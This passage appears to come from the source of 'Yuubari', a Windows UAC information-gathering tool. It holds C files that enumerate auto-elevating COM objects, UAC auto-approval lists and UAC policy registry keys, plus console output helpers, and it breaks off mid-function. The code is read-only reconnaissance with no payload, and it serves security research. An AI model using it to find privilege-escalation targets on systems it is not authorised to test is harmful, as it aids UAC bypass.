"content": "/*******************************************************************************\n*\n* (C) COPYRIGHT AUTHORS, 2014 - 2025\n*\n* TITLE: COMOBJ.C\n*\n* VERSION: 1.60\n*\n* DATE: 17 Jun 2025\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#include \"global.h\"\n#include \n#include \n#include \n#pragma comment(lib, \"Shlwapi.lib\")\n#pragma comment(lib, \"Rpcrt4.lib\")\n\nVOID CopScanRegistry(\n _In_ HKEY RootKey,\n _In_ OUTPUTCALLBACK OutputCallback,\n _In_ INTERFACE_INFO_LIST *InterfaceList);\n\n/*\n* CopRunOutputCallbackForInterface\n*\n* Purpose:\n*\n* Output interface information.\n*\n*/\nVOID CopRunOutputCallbackForInterface(\n _In_ ULONG DataType,\n _In_ INTERFACE_INFO *Interface,\n _In_ CLSID clsid,\n _In_ OUTPUTCALLBACK OutputCallback\n)\n{\n UAC_INTERFACE_DATA Data;\n\n RtlSecureZeroMemory(&Data, sizeof(Data));\n Data.DataType = DataType;\n Data.Name = Interface->szInterfaceName;\n Data.Clsid = clsid;\n Data.IID = Interface->iid;\n OutputCallback((PVOID)&Data);\n}\n\n/*\n* CopLocateInterfaceByCLSID\n*\n* Purpose:\n*\n* Search for interface by CLSID.\n*\n*/\nINTERFACE_INFO* CopLocateInterfaceByCLSID(\n _In_ INTERFACE_INFO_LIST *InterfaceList,\n _In_ CLSID clsid\n)\n{\n IUnknown *Interface = NULL;\n IUnknown *TestObject = NULL;\n\n ULONG i;\n\n INTERFACE_INFO* Result = NULL;\n\n if (SUCCEEDED(CoCreateInstance(&clsid, NULL, CLSCTX_INPROC_SERVER,\n &IID_IUnknown, (LPVOID)&Interface)))\n {\n for (i = 0; i < InterfaceList->cEntries; i++) {\n Interface->lpVtbl->QueryInterface(Interface, &InterfaceList->List[i].iid, &TestObject);\n if (TestObject != NULL) {\n TestObject->lpVtbl->Release(TestObject);\n Result = &InterfaceList->List[i];\n break;\n }\n }\n Interface->lpVtbl->Release(Interface);\n }\n\n return Result;\n}\n\n/*\n* CopQuerySubKey\n*\n* Purpose:\n*\n* Query subkey elevated COM object name.\n*\n*/\nVOID CopQuerySubKey(\n _In_ HKEY RootKey,\n _In_ LPWSTR lpKeyName,\n _In_ BOOL ElevationKey,\n _In_ OUTPUTCALLBACK OutputCallback,\n _In_ INTERFACE_INFO_LIST *InterfaceList\n)\n{\n LRESULT lRet;\n HKEY hSubKey = NULL, hAppIdKey = NULL, hServerObjectsKey = NULL;\n DWORD dwDataSize, dwEnabled = 0;\n LPWSTR lpName = NULL, lpAppId = NULL, lpAppIdName = NULL, lpLocalizedString = NULL, t = NULL, lpValue = NULL;\n\n ULONG i, cValues = 0, cMaxLength = 0, cchValue;\n\n CLSID clsid;\n\n UAC_REGISTRY_DATA Data;\n INTERFACE_INFO *LookupInterface;\n\n BOOLEAN VirtualFactory = FALSE;\n\n //open each sub key\n lRet = RegOpenKeyEx(RootKey, lpKeyName, 0, KEY_READ, &hSubKey);\n if ((lRet == ERROR_SUCCESS) && (hSubKey != NULL)) {\n if (ElevationKey) {\n\n do {\n\n dwDataSize = sizeof(DWORD);\n dwEnabled = 0;\n\n //query elevation enabled\n lRet = RegQueryValueEx(hSubKey, TEXT(\"Enabled\"), NULL,\n NULL,\n (LPBYTE)&dwEnabled,\n &dwDataSize\n );\n\n if (lRet != ERROR_SUCCESS)\n break;\n\n if (dwEnabled != 1)\n break;\n\n //\n // Check virtual factory.\n //\n lRet = RegOpenKeyEx(RootKey, TEXT(\"VirtualServerObjects\"), 0, KEY_READ, &hServerObjectsKey);\n VirtualFactory = ((lRet == ERROR_SUCCESS) && (hServerObjectsKey != NULL));\n\n //query object name\n lpName = supReadKeyString(RootKey, TEXT(\"\"), &dwDataSize);\n\n //query localized string and convert it\n dwDataSize = 0;\n t = supReadKeyString(RootKey, TEXT(\"LocalizedString\"), &dwDataSize);\n if (t) {\n lpLocalizedString = (LPWSTR)supHeapAlloc((SIZE_T)MAX_PATH * 2);\n if (lpLocalizedString) {\n SHLoadIndirectString(t, lpLocalizedString, MAX_PATH, NULL);\n }\n supHeapFree(t);\n }\n\n //check if AppId present\n dwDataSize = 0;\n t = supReadKeyString(RootKey, TEXT(\"AppId\"), &dwDataSize);\n if (t) {\n lpAppId = (LPWSTR)supHeapAlloc((SIZE_T)dwDataSize + 32);\n if (lpAppId) {\n _strcpy(lpAppId, TEXT(\"AppId\\\\\"));\n _strcat(lpAppId, t);\n\n //open AppId key\n lRet = RegOpenKeyEx(HKEY_CLASSES_ROOT, lpAppId, 0,\n KEY_READ, &hAppIdKey);\n if (lRet == ERROR_SUCCESS) {\n //check if AccessPermisions present\n lRet = RegQueryValueEx(hAppIdKey, TEXT(\"AccessPermission\"),\n NULL, NULL, NULL, NULL);\n\n if (lRet == ERROR_SUCCESS) {\n //if they found query name\n dwDataSize = 0;\n lpAppIdName = supReadKeyString(hAppIdKey, TEXT(\"\"), &dwDataSize);\n }\n RegCloseKey(hAppIdKey);\n }\n }\n supHeapFree(t);\n }\n\n //\n // Write output\n //\n RtlSecureZeroMemory(&Data, sizeof(Data));\n\n if (lpName) {\n Data.Name = lpName;\n }\n else {\n Data.Name = TEXT(\"undefined\");\n }\n\n if (lpAppIdName) {\n Data.AppId = lpAppIdName;\n }\n else {\n if (lpAppId) {\n Data.AppId = lpAppId;\n }\n else {\n Data.AppId = TEXT(\"undefined\");\n }\n }\n\n if (lpLocalizedString) {\n Data.LocalizedString = lpLocalizedString;\n }\n else {\n Data.LocalizedString = TEXT(\"undefined\");\n }\n\n Data.Key = (LPWSTR)supQueryKeyName(RootKey, NULL);\n\n if (VirtualFactory)\n Data.DataType = UacCOMDataVirtualFactory;\n else\n Data.DataType = UacCOMDataCommonType;\n\n OutputCallback((PVOID)&Data);\n\n if (Data.Key) {\n supHeapFree(Data.Key);\n }\n\n //\n // Output virtual server objects.\n //\n if (VirtualFactory) {\n\n lRet = RegQueryInfoKey(hServerObjectsKey, NULL, NULL, NULL, NULL, NULL, NULL,\n &cValues, &cMaxLength, NULL, NULL, NULL);\n\n if (lRet == ERROR_SUCCESS) {\n\n cMaxLength = (DWORD)((cMaxLength + 1) * sizeof(WCHAR));\n lpValue = (LPWSTR)supHeapAlloc(cMaxLength);\n if (lpValue) {\n\n for (i = 0; i < cValues; i++) {\n cchValue = (DWORD)(cMaxLength / sizeof(WCHAR));\n if (RegEnumValue(hServerObjectsKey, i, lpValue, &cchValue, NULL, NULL, NULL, NULL) == ERROR_SUCCESS) {\n\n if (CLSIDFromString(lpValue, &clsid) == S_OK) {\n LookupInterface = CopLocateInterfaceByCLSID(InterfaceList, clsid);\n if (LookupInterface) {\n\n CopRunOutputCallbackForInterface(\n UacCOMDataInterfaceTypeVF,\n LookupInterface,\n clsid,\n OutputCallback);\n\n }\n }\n }\n }\n\n supHeapFree(lpValue);\n }\n }\n RegCloseKey(hServerObjectsKey);\n }\n\n\n } while (FALSE);\n\n if (lpAppIdName)\n supHeapFree(lpAppIdName);\n\n if (lpAppId != NULL)\n supHeapFree(lpAppId);\n\n if (lpName != NULL)\n supHeapFree(lpName);\n }\n else {\n CopScanRegistry(hSubKey, OutputCallback, InterfaceList);\n }\n RegCloseKey(hSubKey);\n }\n}\n\n/*\n* CopEnumSubKey\n*\n* Purpose:\n*\n* Enumerate key subkeys, check elevation flag.\n*\n*/\nVOID CopEnumSubKey(\n _In_ HKEY hKey,\n _In_ DWORD dwKeyIndex,\n _In_ OUTPUTCALLBACK OutputCallback,\n _In_ INTERFACE_INFO_LIST *InterfaceList\n)\n{\n BOOL bElevation = FALSE;\n LRESULT lRet;\n DWORD dwcbName = 0, cch;\n LPTSTR lpKeyName = NULL;\n\n do {\n dwcbName = 32 * 1024;\n lpKeyName = (LPTSTR)supHeapAlloc(dwcbName);\n if (lpKeyName == NULL)\n break;\n\n cch = dwcbName / sizeof(WCHAR);\n lRet = RegEnumKeyEx(hKey, dwKeyIndex,\n lpKeyName, &cch, NULL, NULL, NULL, NULL);\n if (lRet == ERROR_MORE_DATA) {\n dwcbName *= 2;\n supHeapFree(lpKeyName);\n lpKeyName = NULL;\n continue;\n }\n if (lRet == ERROR_SUCCESS) {\n //skip wow64 shit\n if (_strcmpi(lpKeyName, TEXT(\"Wow6432Node\")) == 0)\n break;\n\n if (_strcmpi(lpKeyName, TEXT(\"Elevation\")) == 0)\n bElevation = TRUE;\n\n CopQuerySubKey(hKey, lpKeyName, bElevation, OutputCallback, InterfaceList);\n }\n\n } while (lRet == ERROR_MORE_DATA);\n\n if (lpKeyName != NULL)\n supHeapFree(lpKeyName);\n\n}\n\n/*\n* CopScanRegistry\n*\n* Purpose:\n*\n* Recursively scan registry looking for autoelevated COM entries.\n*\n*/\nVOID CopScanRegistry(\n _In_ HKEY RootKey,\n _In_ OUTPUTCALLBACK OutputCallback,\n _In_ INTERFACE_INFO_LIST *InterfaceList\n)\n{\n HKEY hKey = NULL;\n LRESULT lRet;\n DWORD dwcSubKeys = 0, i;\n\n do {\n //open root key for enumeration\n lRet = RegOpenKeyEx(RootKey, NULL, 0, KEY_READ, &hKey);\n if ((lRet != ERROR_SUCCESS) || (hKey == NULL))\n break;\n\n //query subkeys count\n lRet = RegQueryInfoKey(hKey, NULL, NULL, NULL, &dwcSubKeys,\n NULL, NULL, NULL, NULL, NULL, NULL, NULL);\n\n if ((lRet != ERROR_SUCCESS) || (dwcSubKeys == 0))\n break;\n\n for (i = 0; i < dwcSubKeys; i++)\n CopEnumSubKey(hKey, i, OutputCallback, InterfaceList);\n\n } while (FALSE);\n\n if (hKey != NULL)\n RegCloseKey(hKey);\n}\n\n/*\n* CoEnumInterfaces\n*\n* Purpose:\n*\n* Remember list of available interfaces, excluding IUnknown.\n*\n*/\nBOOL CoEnumInterfaces(\n _Inout_ INTERFACE_INFO_LIST *InterfaceList\n)\n{\n BOOL bResult = FALSE;\n HKEY hKey = NULL;\n LRESULT lRet;\n RPC_STATUS RpcStatus = 0;\n LPWSTR lpKeyName = NULL;\n SIZE_T k;\n DWORD i, cSubKeys = 0, cMaxLength = 0, cchKey;\n IID iid;\n\n INTERFACE_INFO *infoBuffer;\n\n __try {\n\n lRet = RegOpenKeyEx(HKEY_CLASSES_ROOT, TEXT(\"Interface\"), 0, KEY_READ, &hKey);\n if (lRet != ERROR_SUCCESS)\n __leave;\n\n lRet = RegQueryInfoKey(hKey, NULL, NULL, NULL, &cSubKeys, &cMaxLength, NULL,\n NULL, NULL, NULL, NULL, NULL);\n if ((lRet != ERROR_SUCCESS) || (cSubKeys == 0))\n __leave;\n\n if (cSubKeys > 0xFFFF) {\n __leave;\n }\n\n infoBuffer = (INTERFACE_INFO*)supHeapAlloc(cSubKeys * sizeof(INTERFACE_INFO));\n if (infoBuffer == NULL)\n __leave;\n\n cMaxLength = (DWORD)((cMaxLength + 1) * sizeof(WCHAR));\n lpKeyName = (LPWSTR)supHeapAlloc(cMaxLength);\n if (lpKeyName == NULL)\n __leave;\n\n for (k = 0, i = 0; i < cSubKeys; i++) {\n\n cchKey = (DWORD)(cMaxLength / sizeof(WCHAR));\n if (RegEnumKeyEx(hKey, i, lpKeyName, &cchKey, NULL, NULL, NULL, NULL) == ERROR_SUCCESS) {\n\n if (IIDFromString(lpKeyName, &iid) == S_OK) {\n\n //skip IUnknown\n if (UuidCompare((UUID*)&iid, (UUID*)&IID_IUnknown, &RpcStatus) == 0)\n continue;\n\n cchKey = MAX_PATH * sizeof(WCHAR);\n infoBuffer[k].iid = iid;\n\n RegGetValue(hKey, lpKeyName, TEXT(\"\"), RRF_RT_REG_SZ, NULL,\n (LPWSTR)&infoBuffer[k].szInterfaceName, &cchKey);\n\n k++;\n\n if (k >= cSubKeys)\n break;\n }\n }\n }\n InterfaceList->cEntries = (ULONG)k;\n InterfaceList->List = infoBuffer;\n bResult = TRUE;\n }\n __finally {\n if (hKey)\n RegCloseKey(hKey);\n\n if (lpKeyName)\n supHeapFree(lpKeyName);\n }\n\n return bResult;\n}\n\n/*\n* CoScanAutoApprovalList\n*\n* Purpose:\n*\n* Query list of autoapproval COM objects used by OOBE ICreateObject interface.\n*\n*/\nVOID CoScanBrokerApprovalList(\n _In_ OUTPUTCALLBACK OutputCallback,\n _In_ INTERFACE_INFO_LIST *InterfaceList\n)\n{\n HKEY hKey = NULL, hSubKey = NULL;\n LRESULT lRet;\n LPWSTR lpSubKey = NULL;\n DWORD i, cSubKeys = 0, cMaxLength = 0, cchSubKey, dwType, dwData, cbData;\n\n CLSID clsid;\n\n INTERFACE_INFO *LookupInterface;\n\n __try {\n\n lRet = RegOpenKeyEx(HKEY_LOCAL_MACHINE, T_UAC_BROKER_APPROVAL_LIST, 0, KEY_READ, &hKey);\n if (lRet != ERROR_SUCCESS)\n __leave;\n\n lRet = RegQueryInfoKey(hKey, NULL, NULL, NULL, &cSubKeys, &cMaxLength, NULL,\n NULL, NULL, NULL, NULL, NULL);\n if ((lRet != ERROR_SUCCESS) || (cSubKeys == 0))\n __leave;\n\n cMaxLength = (DWORD)((cMaxLength + 1) * sizeof(WCHAR));\n lpSubKey = (LPWSTR)supHeapAlloc(cMaxLength);\n if (lpSubKey == NULL)\n __leave;\n\n for (i = 0; i < cSubKeys; i++) {\n cchSubKey = (DWORD)(cMaxLength / sizeof(WCHAR));\n if (RegEnumKeyEx(hKey, i, lpSubKey, &cchSubKey, NULL, NULL, NULL, NULL) == ERROR_SUCCESS) {\n\n //\n // Check AutoElevationAllowed\n //\n if (RegOpenKey(hKey, lpSubKey, &hSubKey) == ERROR_SUCCESS) {\n\n dwType = REG_DWORD;\n cbData = sizeof(DWORD);\n dwData = 0;\n\n if (RegQueryValueEx(hSubKey,\n TEXT(\"AutoElevationAllowed\"),\n 0,\n &dwType,\n (LPBYTE)&dwData,\n &cbData) == ERROR_SUCCESS)\n {\n if ((cbData == sizeof(DWORD)) && (dwData == 1)) {\n\n //\n // Find interface and output to the callback.\n //\n if (CLSIDFromString(lpSubKey, &clsid) == S_OK) {\n LookupInterface = CopLocateInterfaceByCLSID(InterfaceList, clsid);\n if (LookupInterface) {\n\n CopRunOutputCallbackForInterface(\n UacCOMDataInterfaceType,\n LookupInterface,\n clsid,\n OutputCallback);\n }\n }\n }\n }\n\n RegCloseKey(hSubKey);\n }\n\n }\n }\n\n }\n __finally {\n\n if (hKey)\n RegCloseKey(hKey);\n\n if (lpSubKey)\n supHeapFree(lpSubKey);\n\n }\n}\n\n/*\n* CoScanAutoApprovalList\n*\n* Purpose:\n*\n* Query list of autoapproval COM objects.\n* This key was added in RS1 specially for consent.exe comfort\n*\n*/\nVOID CoScanAutoApprovalList(\n _In_ OUTPUTCALLBACK OutputCallback,\n _In_ INTERFACE_INFO_LIST *InterfaceList\n)\n{\n HKEY hKey = NULL;\n LRESULT lRet;\n LPWSTR lpValue = NULL;\n DWORD i, cValues = 0, cMaxLength = 0, cchValue;\n\n CLSID clsid;\n\n INTERFACE_INFO *LookupInterface;\n\n __try {\n\n lRet = RegOpenKeyEx(HKEY_LOCAL_MACHINE, T_UAC_COM_AUTOAPPROVAL_LIST, 0, KEY_READ, &hKey);\n if (lRet != ERROR_SUCCESS)\n __leave;\n\n lRet = RegQueryInfoKey(hKey, NULL, NULL, NULL, NULL, NULL, NULL,\n &cValues, &cMaxLength, NULL, NULL, NULL);\n if ((lRet != ERROR_SUCCESS) || (cValues == 0))\n __leave;\n\n cMaxLength = (DWORD)((cMaxLength + 1) * sizeof(WCHAR));\n lpValue = (LPWSTR)supHeapAlloc(cMaxLength);\n if (lpValue == NULL)\n __leave;\n\n for (i = 0; i < cValues; i++) {\n cchValue = (DWORD)(cMaxLength / sizeof(WCHAR));\n if (RegEnumValue(hKey, i, lpValue, &cchValue, NULL, NULL, NULL, NULL) == ERROR_SUCCESS) {\n if (CLSIDFromString(lpValue, &clsid) == S_OK) {\n LookupInterface = CopLocateInterfaceByCLSID(InterfaceList, clsid);\n if (LookupInterface) {\n\n CopRunOutputCallbackForInterface(\n UacCOMDataInterfaceType,\n LookupInterface,\n clsid,\n OutputCallback);\n\n }\n }\n }\n }\n }\n __finally {\n\n if (hKey)\n RegCloseKey(hKey);\n\n if (lpValue)\n supHeapFree(lpValue);\n\n }\n}\n\n/*\n* CoListInformation\n*\n* Purpose:\n*\n* Scan registry looking for autoelevated COM.\n*\n*/\nVOID CoListInformation(\n _In_ OUTPUTCALLBACK OutputCallback,\n _In_ INTERFACE_INFO_LIST *InterfaceList\n)\n{\n if (OutputCallback) {\n CopScanRegistry(HKEY_CLASSES_ROOT, OutputCallback, InterfaceList);\n }\n}\n"
},
{
"path": "Source/Yuubari/comobj.h",
"content": "#/*******************************************************************************\n*\n* (C) COPYRIGHT AUTHORS, 2014 - 2019\n*\n* TITLE: COMOBJ.H\n*\n* VERSION: 1.45\n*\n* DATE: 22 Oct 2019\n*\n* Header file for the COM registry objects scan.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#pragma once\n\n#define UacCOMDataCommonType 0\n#define UacCOMDataInterfaceType 1\n#define UacCOMDataInterfaceTypeVF 2\n#define UacCOMDataVirtualFactory 3\n\ntypedef struct _INTERFACE_INFO {\n IID iid;\n WCHAR szInterfaceName[MAX_PATH];\n} INTERFACE_INFO, *PINTERFACE_INFO;\n\ntypedef struct _INTERFACE_INFO_LIST {\n ULONG cEntries;\n INTERFACE_INFO *List;\n} INTERFACE_INFO_LIST, *PINTERFACE_INFO_LIST;\n\ntypedef struct _UAC_INTERFACE_DATA {\n DWORD DataType;\n LPWSTR Name;\n CLSID Clsid;\n IID IID;\n} UAC_INTERFACE_DATA, *PUAC_INTERFACE_DATA;\n\ntypedef struct _UAC_REGISTRY_DATA {\n DWORD DataType;\n LPWSTR Name;\n LPWSTR Key;\n LPWSTR AppId;\n LPWSTR LocalizedString;\n} UAC_REGISTRY_DATA, *PUAC_REGISTRY_DATA;\n\nVOID CoListInformation(\n _In_ OUTPUTCALLBACK OutputCallback,\n _In_ INTERFACE_INFO_LIST *InterfaceList);\n\nBOOL CoEnumInterfaces(\n _Inout_ INTERFACE_INFO_LIST *InterfaceList);\n\nVOID CoScanAutoApprovalList(\n _In_ OUTPUTCALLBACK OutputCallback,\n _In_ INTERFACE_INFO_LIST *InterfaceList);\n\nVOID CoScanBrokerApprovalList(\n _In_ OUTPUTCALLBACK OutputCallback,\n _In_ INTERFACE_INFO_LIST *InterfaceList);\n"
},
{
"path": "Source/Yuubari/consts.h",
"content": "/*******************************************************************************\n*\n* (C) COPYRIGHT AUTHORS, 2017 - 2026\n*\n* TITLE: CONSTS.H\n*\n* VERSION: 1.61\n*\n* DATE: 12 Feb 2026\n*\n* Global consts definition file.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#pragma once\n\n#define YUUBARI_MIN_SUPPORTED_NT_BUILD NT_WIN7_RTM\n#define YUUBARI_MAX_SUPPORTED_NT_BUILD NT_WIN11_24H2\n\n#define T_UAC_COM_AUTOAPPROVAL_LIST TEXT(\"SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\UAC\\\\COMAutoApprovalList\") //RS1+\n#define T_UAC_BROKER_APPROVAL_LIST TEXT(\"SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\CloudExperienceHost\\\\Broker\\\\ElevatedClsids\")\n#define T_UAC_SETTINGS_KEY TEXT(\"SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\")\n#define T_UAC_PROMPT_BEHAVIOR TEXT(\"ConsentPromptBehaviorAdmin\")\n#define T_UAC_SECURE_DESKTOP TEXT(\"PromptOnSecureDesktop\")\n#define T_UAC_RESTRICTED_AUTOAPPROVE TEXT(\"EnableRestrictedAutoApprove\") //RS1+\n#define T_UAC_AUTOAPPROVEIC TEXT(\"EnableAutoApproveIntegrityContinuity\") //RS2+, AipAutoApproveHardeningPolicy\n#define T_UAC_AUTOAPPROVEMP TEXT(\"AutoApproveMitigationPolicy\") //RS2+, AipAutoApproveHardeningPolicy\n#define T_UAC_AUTOAPPROVEHARDCLAIMS TEXT(\"AutoApproveHardeningClaims\") //RS2+, AipMarkAutoApprovedToken(TokenSecurityAttributes)\n#define T_UAC_ENABLESECUREUIPATHS TEXT(\"EnableSecureUIAPaths\") //RS2+, Only elevate UIAccess applications that are installed in secure locations\n\n#define T_FLAG_ELEVATION_ENABLED TEXT(\"ElevationEnabled\")\n#define T_FLAG_VIRTUALIZATION_ENABLED TEXT(\"VirtualizationEnabled\")\n#define T_FLAG_INSTALLERDETECT_ENABLED TEXT(\"InstallerDetectEnabled\")\n\n#define T_PROGRAM_NAME TEXT(\"Yuubari\")\n#define T_PROGRAM_TITLE TEXT(\"[UacView] UAC information gathering tool, v1.6.1 (Feb 12, 2026)\\r\\n\")\n\n#define T_HELP\tTEXT(\"Optional parameters to execute: \\r\\n\\n\\\nYUUBARI [/v] \\r\\n\\n\\\n /v - produce verbose output.\")\n\n#define T_SPLIT TEXT(\"===============================================================\")\n#define T_BASIC_HEAD TEXT(\"\\r\\n[UacView] Basic UAC settings\\r\\n\")\n#define T_COM_HEAD TEXT(\"\\r\\n[UacView] Autoelevated COM objects\\r\\n\")\n#define T_COM_APPROVE_HEAD TEXT(\"\\r\\n[UacView] COMAutoApproval list\\r\\n\")\n#define T_BROKER_APPROVE_HEAD TEXT(\"\\r\\n[UacView] Broker approval list\\r\\n\")\n#define T_WINFILES_HEAD TEXT(\"\\r\\n[UacView] Autoelevated applications in Windows directory\\r\\n\")\n#define T_PFDIRFILES_HEAD TEXT(\"\\r\\n[UacView] Autoelevated applications in Program Files directory\\r\\n\")\n#define T_APPINFO_HEAD TEXT(\"\\r\\n[UacView] Appinfo data\\r\\n\")\n"
},
{
"path": "Source/Yuubari/cui.c",
"content": "/*******************************************************************************\n*\n* (C) COPYRIGHT AUTHORS, 2016 - 2025\n*\n* TITLE: CUI.C\n*\n* VERSION: 1.60\n*\n* DATE: 17 Jun 2025\n*\n* Console output.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#include \"global.h\"\n\nHANDLE g_ConOut = NULL, g_ConIn = NULL;\nBOOL g_ConsoleOutput = FALSE;\nWCHAR g_BE = 0xFEFF;\nconst SIZE_T MAX_CONSOLE_OUTPUT = 4096;\n\n\n/*\n* cuiInitialize\n*\n* Purpose:\n*\n* Initialize console input/output.\n*\n*/\nVOID cuiInitialize(\n _In_ BOOL InitInput,\n _Out_opt_ PBOOL IsConsoleOutput\n)\n{\n ULONG dummy;\n\n g_ConOut = GetStdHandle(STD_OUTPUT_HANDLE);\n if (g_ConOut == INVALID_HANDLE_VALUE || g_ConOut == NULL) {\n g_ConOut = GetStdHandle(STD_ERROR_HANDLE);\n }\n\n if (InitInput) {\n g_ConIn = GetStdHandle(STD_INPUT_HANDLE);\n if (g_ConIn == INVALID_HANDLE_VALUE) {\n g_ConIn = NULL;\n }\n }\n\n g_ConsoleOutput = TRUE;\n\n if (g_ConOut != INVALID_HANDLE_VALUE && g_ConOut != NULL) {\n SetConsoleMode(g_ConOut, ENABLE_LINE_INPUT | ENABLE_ECHO_INPUT | ENABLE_PROCESSED_OUTPUT);\n\n if (!GetConsoleMode(g_ConOut, &dummy)) {\n g_ConsoleOutput = FALSE;\n WriteFile(g_ConOut, &g_BE, sizeof(WCHAR), &dummy, NULL);\n }\n }\n else {\n g_ConsoleOutput = FALSE;\n }\n\n if (IsConsoleOutput)\n *IsConsoleOutput = g_ConsoleOutput;\n\n return;\n}\n\n/*\n* cuiClrScr\n*\n* Purpose:\n*\n* Clear screen.\n*\n*/\nVOID cuiClrScr(\n VOID\n)\n{\n COORD coordScreen;\n DWORD cCharsWritten;\n DWORD dwConSize;\n CONSOLE_SCREEN_BUFFER_INFO csbi;\n\n coordScreen.X = 0;\n coordScreen.Y = 0;\n\n if (!GetConsoleScreenBufferInfo(g_ConOut, &csbi))\n return;\n\n dwConSize = csbi.dwSize.X * csbi.dwSize.Y;\n\n if (!FillConsoleOutputCharacter(g_ConOut, TEXT(' '),\n dwConSize, coordScreen, &cCharsWritten))\n return;\n\n if (!GetConsoleScreenBufferInfo(g_ConOut, &csbi))\n return;\n\n if (!FillConsoleOutputAttribute(g_ConOut, csbi.wAttributes,\n dwConSize, coordScreen, &cCharsWritten))\n return;\n\n SetConsoleCursorPosition(g_ConOut, coordScreen);\n}\n\n/*\n* cuiPrintTextA\n*\n* Purpose:\n*\n* Output text to the console or file.\n* ANSI version.\n*\n*/\nVOID cuiPrintTextA(\n _In_ LPSTR lpText,\n _In_ BOOL UseReturn\n)\n{\n BOOL writeSuccess;\n DWORD bytesIO;\n SIZE_T consoleIO, bufferSize, copySize;\n LPSTR Buffer;\n\n if (lpText == NULL)\n return;\n\n consoleIO = _strlen_a(lpText);\n if (consoleIO == 0 || consoleIO > MAX_CONSOLE_OUTPUT)\n return;\n\n if (UseReturn) {\n bufferSize = consoleIO + 3;\n }\n else {\n bufferSize = consoleIO + 1;\n }\n\n if (bufferSize > MAX_CONSOLE_OUTPUT)\n return;\n\n Buffer = (LPSTR)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, bufferSize);\n if (Buffer) {\n copySize = min(bufferSize - 1, consoleIO);\n memcpy(Buffer, lpText, copySize);\n Buffer[copySize] = '\\0';\n\n if (UseReturn) _strcat_a(Buffer, \"\\r\\n\");\n\n consoleIO = _strlen_a(Buffer);\n\n if (g_ConsoleOutput != FALSE) {\n writeSuccess = WriteConsoleA(g_ConOut, Buffer, (DWORD)consoleIO, &bytesIO, NULL);\n }\n else {\n writeSuccess = WriteFile(g_ConOut, Buffer, (DWORD)consoleIO, &bytesIO, NULL);\n }\n\n HeapFree(GetProcessHeap(), 0, Buffer);\n }\n}\n\n/*\n* cuiPrintTextW\n*\n* Purpose:\n*\n* Output text to the console or file.\n* UNICODE version.\n*\n*/\nVOID cuiPrintTextW(\n _In_ LPWSTR lpText,\n _In_ BOOL UseReturn\n)\n{\n BOOL writeSuccess;\n DWORD bytesIO;\n SIZE_T consoleIO, bufferSize, copySize;\n LPWSTR Buffer;\n\n if (lpText == NULL)\n return;\n\n consoleIO = _strlen_w(lpText);\n if (consoleIO == 0 || consoleIO > MAX_CONSOLE_OUTPUT)\n return;\n\n if (UseReturn) {\n bufferSize = (consoleIO + 3) * sizeof(WCHAR);\n }\n else {\n bufferSize = (consoleIO + 1) * sizeof(WCHAR);\n }\n\n if (bufferSize > MAX_CONSOLE_OUTPUT * sizeof(WCHAR))\n return;\n\n Buffer = (LPWSTR)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, bufferSize);\n if (Buffer) {\n copySize = min(bufferSize / sizeof(WCHAR) - 1, consoleIO);\n memcpy(Buffer, lpText, copySize * sizeof(WCHAR));\n Buffer[copySize] = L'\\0';\n\n if (UseReturn) _strcat_w(Buffer, TEXT(\"\\r\\n\"));\n\n consoleIO = _strlen_w(Buffer);\n\n if (g_ConsoleOutput != FALSE) {\n writeSuccess = WriteConsoleW(g_ConOut, Buffer, (DWORD)consoleIO, &bytesIO, NULL);\n }\n else {\n writeSuccess = WriteFile(g_ConOut, Buffer, (DWORD)(consoleIO * sizeof(WCHAR)), &bytesIO, NULL);\n }\n\n HeapFree(GetProcessHeap(), 0, Buffer);\n }\n}\n\n/*\n* cuiPrintTextLastErrorA\n*\n* Purpose:\n*\n* Output LastError translated code to the console or file.\n* ANSI version.\n*\n*/\nVOID cuiPrintTextLastErrorA(\n _In_ BOOL UseReturn\n)\n{\n CHAR szTextBuffer[1024];\n DWORD dwLastError = GetLastError();\n\n RtlSecureZeroMemory(szTextBuffer, sizeof(szTextBuffer));\n if (FormatMessageA(FORMAT_MESSAGE_FROM_SYSTEM, NULL, dwLastError, LANG_USER_DEFAULT,\n (LPSTR)&szTextBuffer, sizeof(szTextBuffer) - 64, NULL) == 0)\n {\n _strcpy_a(szTextBuffer, \"Error code: \");\n itostr_a(dwLastError, _strend_a(szTextBuffer));\n }\n cuiPrintTextA(szTextBuffer, UseReturn);\n}\n\n/*\n* cuiPrintTextLastErrorW\n*\n* Purpose:\n*\n* Output LastError translated code to the console or file.\n* UNICODE version.\n*\n*/\nVOID cuiPrintTextLastErrorW(\n _In_ BOOL UseReturn\n)\n{\n WCHAR szTextBuffer[1024];\n DWORD dwLastError = GetLastError();\n\n RtlSecureZeroMemory(szTextBuffer, sizeof(szTextBuffer));\n if (FormatMessageW(FORMAT_MESSAGE_FROM_SYSTEM, NULL, dwLastError, LANG_USER_DEFAULT,\n (LPWSTR)&szTextBuffer, 